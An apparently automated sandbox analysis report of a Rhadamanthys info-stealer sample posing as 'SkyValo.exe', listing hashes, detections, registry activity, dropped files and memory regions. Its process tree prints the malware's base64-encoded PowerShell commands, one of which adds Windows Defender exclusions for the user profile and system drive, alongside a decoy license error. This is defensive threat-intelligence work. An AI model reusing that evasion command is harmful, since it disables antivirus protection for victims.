rhadamanthys | a4704499fb314be36d560f009756f709d61c16f4627e9002d6f2ca08e048f6c1

Resubmissions

23-10-2023 23:04

231023-22jrksgg9y 10

23-10-2023 22:34

231023-2hlf3agf2w 10

Analysis

max time kernel
6s
max time network
24s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
23-10-2023 23:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SkyValo.exe
Size

638KB
MD5

e73e141a15cadcc8ab8ec09d712c59b0
SHA1

bace5f12f6ff22a0f1afc12b5d772d6c44cc0e61
SHA256

a4704499fb314be36d560f009756f709d61c16f4627e9002d6f2ca08e048f6c1
SHA512

101b15b36ba97213575f713de30deeb1c9c7c089432dfaba32d608a8aadfd14b76d7db6aeed79a72af8a6ee0b62ae6ebae0953e9927770eee8d8b0d384ad3c30
SSDEEP

12288:PjOubH2seO0lXVrUy201HuEZA6PUifgDsqAhPSQIXY:PjOaWseO2XV4y2suEZ5PUygQhhPMXY

Score

10^/10

rhadamanthys stealer

Malware Config

Signatures

Detect rhadamanthys stealer shellcode 4 IoCs

resource	yara_rule
behavioral1/memory/4372-31-0x0000000002500000-0x0000000002900000-memory.dmp	family_rhadamanthys
behavioral1/memory/4372-35-0x0000000002500000-0x0000000002900000-memory.dmp	family_rhadamanthys
behavioral1/memory/4372-34-0x0000000002500000-0x0000000002900000-memory.dmp	family_rhadamanthys
behavioral1/memory/4372-38-0x0000000002500000-0x0000000002900000-memory.dmp	family_rhadamanthys

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys

Executes dropped EXE 1 IoCs

pid	Process
4372	svchost.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 2 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	svchost.exe

Modifies registry class 4 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2508097367-364665605-1201309312-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2508097367-364665605-1201309312-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2508097367-364665605-1201309312-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2508097367-364665605-1201309312-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4372	svchost.exe
4372	svchost.exe
4168	powershell.exe
3376	powershell.exe
3376	powershell.exe
4168	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3376	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4092	MicrosoftEdge.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4396 wrote to memory of 4168	4396	SkyValo.exe	71
PID 4396 wrote to memory of 4168	4396	SkyValo.exe	71
PID 4396 wrote to memory of 4168	4396	SkyValo.exe	71
PID 4396 wrote to memory of 3376	4396	SkyValo.exe	72
PID 4396 wrote to memory of 3376	4396	SkyValo.exe	72
PID 4396 wrote to memory of 3376	4396	SkyValo.exe	72
PID 4396 wrote to memory of 4372	4396	SkyValo.exe	75
PID 4396 wrote to memory of 4372	4396	SkyValo.exe	75
PID 4396 wrote to memory of 4372	4396	SkyValo.exe	75
PID 4396 wrote to memory of 4708	4396	SkyValo.exe	76
PID 4396 wrote to memory of 4708	4396	SkyValo.exe	76
PID 4396 wrote to memory of 4708	4396	SkyValo.exe	76

C:\Users\Admin\AppData\Local\Temp\SkyValo.exe
"C:\Users\Admin\AppData\Local\Temp\SkyValo.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4396
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAbABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAHMAZQAgAGYAbwB1AG4AZAAuACAAUABsAGUAYQBzAGUAIABjAG8AbgBuAGUAYwB0ACAAdgBpAGEAIABzAHQAZQBhAG0AIAB0AG8AIABnAGUAdAAgAGEAIABsAGkAYwBlAG4AcwBlAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAcABxACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4168
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAagBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAcgBiACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3376
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  PID:4372
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\license.bat" "
  2⤵
  PID:4708

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4092

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4972

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:372

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1468

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
32e05f2444df5b7af684f8105b7b87f8

SHA1
381941d3d35458b454eaa7fbc7694c827194c5a8

SHA256
d41e68a5a3165192ac482de7b0d76e07d77eb04c81243b0b889e6abfb97d187d

SHA512
fc0c994c5be244b347b80aef2d54f918159ef85a6b9574408f0237ac26c99e3cb2142627d4386740b92e4eff1693e6d04a9c43d0ba1e11104453b35285d85caf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
de3a22163f3c33ab6ba7d2a5c5e8c16c

SHA1
03fc3536d77bc9be6fc44fd9413534c9ab164c3f

SHA256
8341f0fb442c08efbe8ebe1791b6033902be739ae04d81593101f0c6ef83c457

SHA512
b3ae830839ecdd61c94005e49fc154ed7ae2fb1d61fa611a39e0ceb0c50e50278b7e0c1b44eb55cbb22985819f04a37513bc2b5059abb389cd2508ac03a87952

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\JOVVS0YY\UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuFuYMZ0[1].woff2

Filesize
103KB

MD5
444dea0b2ef8b63a1147e1a8e9dba8cd

SHA1
0a48d4e03b6839c6bcb6f84eeb2ef38f98357d7b

SHA256
a95f31be1f5f63002b25eb8834cfd6d66c08b2b48377abb2d5c1b487f790051b

SHA512
a908053cef6072c63a58b144471b185793e7678693ea492ded05662e3ac79c400138a2c8a3b6e8b1002e1ca4fe63758d6b67fe74b15528b2b65224043b149ad0

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\JOVVS0YY\UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuI6fMZ0[1].woff2

Filesize
102KB

MD5
d06069283fcae3819c65ebadf61f25ff

SHA1
c9cbb863db179293625d9117f88396c7a03bd065

SHA256
3a75a00b9656faae40520f6c952107e1fba1b74c43da0c6be5933f25752f3d1d

SHA512
195c49b5ddeb10f65b1dfcaad7232d38288d006f3038e9710fe1defa9197b02bb9768b2d30377a801004d196b182332d719daade46bf3f72604c3a2279f611ff

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\JOVVS0YY\UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyfMZ0[1].woff2

Filesize
94KB

MD5
576363e652ea6b3b67d64133543bc612

SHA1
6d33bde9b7463fb3fb36cd6b509f3809050c511b

SHA256
2d69f30adf4767819199a4f9ef4004b7e4fd1431d87323259f631da307db57c8

SHA512
4c10c8a9b2622ccffc541a4b5c480e1558cf0a085e9c486d282f2bcc9559401a0a757c0cc10ad5bbca561f1b0809e14967200ee3a23efef77ffcc9d3ce978b2a

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VRPK8AVR\3a01b5d[1].htm

Filesize
315KB

MD5
1b0017ad38a38625e73fd96142e0e53f

SHA1
c0acdddc606f64f1cc86c3e47c690d0c76913c16

SHA256
afc6af14a1609586d2f73c10c0558cfe4412db2044b2322383e9e4d731cdd63f

SHA512
f87018636b62f1731c05d2ca8ed4c682456777d7d035d2372d724bf627c7aeb20bb486e4f2627ef126ead595570f9d7b345141ab11fb1ad1d4916fb37d773434

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q02rcke1.052.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\license.bat

Filesize
40B

MD5
0b667d11abcd8950cae485cf822220f4

SHA1
58e963d436ab5bf929766a6f59b7d21158edebd5

SHA256
67ff64ecbd272ece61acd917e55bd965098853a8e341bc5468a272d476e229c5

SHA512
ca279059b5e525375dbf6f6fb6b4699ed34c7b46ce208cc461dbcf18e2934343f33b7510a24367a890c78ce95536ffbaf3ebbd6f604c225cbacdd0d53193053c

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
456KB

MD5
515a0c8be21a5ba836e5687fc2d73333

SHA1
c52be9d0d37ac1b8d6bc09860e68e9e0615255ab

SHA256
9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae

SHA512
4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
456KB

MD5
515a0c8be21a5ba836e5687fc2d73333

SHA1
c52be9d0d37ac1b8d6bc09860e68e9e0615255ab

SHA256
9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae

SHA512
4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

Download Submit
memory/2292-221-0x000001ED00DD0000-0x000001ED00DD2000-memory.dmp

Filesize
8KB

Download
memory/2292-216-0x000001ED008D0000-0x000001ED008D2000-memory.dmp

Filesize
8KB

Download
memory/2292-423-0x000001ED18190000-0x000001ED181B0000-memory.dmp

Filesize
128KB

Download
memory/2292-219-0x000001ED00D10000-0x000001ED00D12000-memory.dmp

Filesize
8KB

Download
memory/2292-425-0x000001ED11270000-0x000001ED11290000-memory.dmp

Filesize
128KB

Download
memory/3376-626-0x00000000737C0000-0x0000000073EAE000-memory.dmp

Filesize
6.9MB

Download
memory/3376-18-0x0000000007710000-0x0000000007732000-memory.dmp

Filesize
136KB

Download
memory/3376-473-0x00000000044E0000-0x00000000044F0000-memory.dmp

Filesize
64KB

Download
memory/3376-14-0x00000000737C0000-0x0000000073EAE000-memory.dmp

Filesize
6.9MB

Download
memory/3376-552-0x00000000094A0000-0x00000000094BA000-memory.dmp

Filesize
104KB

Download
memory/3376-43-0x0000000007880000-0x000000000789C000-memory.dmp

Filesize
112KB

Download
memory/3376-54-0x00000000081F0000-0x0000000008266000-memory.dmp

Filesize
472KB

Download
memory/3376-565-0x0000000009490000-0x0000000009498000-memory.dmp

Filesize
32KB

Download
memory/3376-79-0x00000000737C0000-0x0000000073EAE000-memory.dmp

Filesize
6.9MB

Download
memory/3376-123-0x0000000009590000-0x0000000009624000-memory.dmp

Filesize
592KB

Download
memory/3376-27-0x0000000007B10000-0x0000000007E60000-memory.dmp

Filesize
3.3MB

Download
memory/3376-460-0x000000007F050000-0x000000007F060000-memory.dmp

Filesize
64KB

Download
memory/3376-16-0x00000000049E0000-0x0000000004A16000-memory.dmp

Filesize
216KB

Download
memory/3376-107-0x0000000009020000-0x000000000903E000-memory.dmp

Filesize
120KB

Download
memory/3376-104-0x000000006DD50000-0x000000006DD9B000-memory.dmp

Filesize
300KB

Download
memory/3376-103-0x0000000009040000-0x0000000009073000-memory.dmp

Filesize
204KB

Download
memory/3376-102-0x000000007F050000-0x000000007F060000-memory.dmp

Filesize
64KB

Download
memory/3376-112-0x00000000091C0000-0x0000000009265000-memory.dmp

Filesize
660KB

Download
memory/3376-118-0x00000000044E0000-0x00000000044F0000-memory.dmp

Filesize
64KB

Download
memory/3376-120-0x00000000044E0000-0x00000000044F0000-memory.dmp

Filesize
64KB

Download
memory/4092-83-0x000002BA0E0F0000-0x000002BA0E0F2000-memory.dmp

Filesize
8KB

Download
memory/4092-44-0x000002BA0D440000-0x000002BA0D450000-memory.dmp

Filesize
64KB

Download
memory/4168-381-0x0000000007110000-0x0000000007120000-memory.dmp

Filesize
64KB

Download
memory/4168-45-0x0000000008180000-0x00000000081CB000-memory.dmp

Filesize
300KB

Download
memory/4168-124-0x000000000A9F0000-0x000000000AEEE000-memory.dmp

Filesize
5.0MB

Download
memory/4168-106-0x00000000095F0000-0x000000000960A000-memory.dmp

Filesize
104KB

Download
memory/4168-105-0x0000000009E70000-0x000000000A4E8000-memory.dmp

Filesize
6.5MB

Download
memory/4168-101-0x0000000007110000-0x0000000007120000-memory.dmp

Filesize
64KB

Download
memory/4168-383-0x0000000007110000-0x0000000007120000-memory.dmp

Filesize
64KB

Download
memory/4168-399-0x00000000737C0000-0x0000000073EAE000-memory.dmp

Filesize
6.9MB

Download
memory/4168-49-0x00000000737C0000-0x0000000073EAE000-memory.dmp

Filesize
6.9MB

Download
memory/4168-125-0x0000000009AA0000-0x0000000009B32000-memory.dmp

Filesize
584KB

Download
memory/4168-13-0x00000000737C0000-0x0000000073EAE000-memory.dmp

Filesize
6.9MB

Download
memory/4168-15-0x0000000007110000-0x0000000007120000-memory.dmp

Filesize
64KB

Download
memory/4168-17-0x0000000007750000-0x0000000007D78000-memory.dmp

Filesize
6.2MB

Download
memory/4168-20-0x0000000007E30000-0x0000000007E96000-memory.dmp

Filesize
408KB

Download
memory/4168-22-0x0000000007EA0000-0x0000000007F06000-memory.dmp

Filesize
408KB

Download
memory/4372-28-0x00000000001D0000-0x00000000001D7000-memory.dmp

Filesize
28KB

Download
memory/4372-31-0x0000000002500000-0x0000000002900000-memory.dmp

Filesize
4.0MB

Download
memory/4372-35-0x0000000002500000-0x0000000002900000-memory.dmp

Filesize
4.0MB

Download
memory/4372-34-0x0000000002500000-0x0000000002900000-memory.dmp

Filesize
4.0MB

Download
memory/4372-38-0x0000000002500000-0x0000000002900000-memory.dmp

Filesize
4.0MB

Download